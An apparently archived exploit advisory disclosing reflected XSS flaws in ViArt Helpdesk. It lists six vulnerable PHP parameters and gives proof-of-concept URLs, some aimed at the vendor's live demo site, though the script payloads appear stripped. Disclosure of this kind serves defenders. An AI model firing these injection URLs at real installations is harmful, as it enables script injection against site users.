/* _____ _ ___ __ | ____|_ _(_) \ \ / /_ _ _ _ | _| \ \ / / | |\ \ /\ / / _` | | | | | |___ \ V /| | | \ V V / (_| | |_| | |_____| \_/ |_|_| \_/\_/ \__,_|\__, | |___/ _____ |_ _|__ __ _ _ __ ___ | |/ _ \/ _` | '_ ` _ \ | | __/ (_| | | | | | | |_|\___|\__,_|_| |_| |_| ViArt Helpdesk Remote XSS Vulnerabilities Discovered By : Moudi Contact : Download : http://www.viart.com/helpdesk Greetings : Mizoz, Zuka, str0ke, 599eme Man. */ [+] Exploit XSS: - Vulnerable code in forum.php (forum_id). - Vulnerable code in article.php (category_id). - Vulnerable code in products.php (category_id). - Vulnerable code in products_search.php (search_category_id). - Vulnerable code in product_details.php (category_id). - Vulnerable code in reviews.php (category_id). - Poc: http://127.0.0.1/article.php?category_id=[XSS] http://127.0.0.1/forum.php?forum_id=[XSS] http://127.0.0.1/products.php?category_id=[XSS] http://127.0.0.1/products_search.php?search_category_id=[XSS] http://127.0.0.1/product_details.php?category_id=[XSS] http://127.0.0.1/reviews.php?category_id=[XSS] http://www.viart.com/helpdesk-demo/article.php?category_id=1--> http://www.viart.com/helpdesk-demo/forum.php?forum_id=1>"> http://www.viart.com/helpdesk-demo/products.php?category_id=1>"> http://www.viart.com/helpdesk-demo/products_search.php?search_category_id=1>"> http://www.viart.com/helpdesk-demo/product_details.php?category_id=1>"> http://www.viart.com/helpdesk-demo/reviews.php?category_id=1>">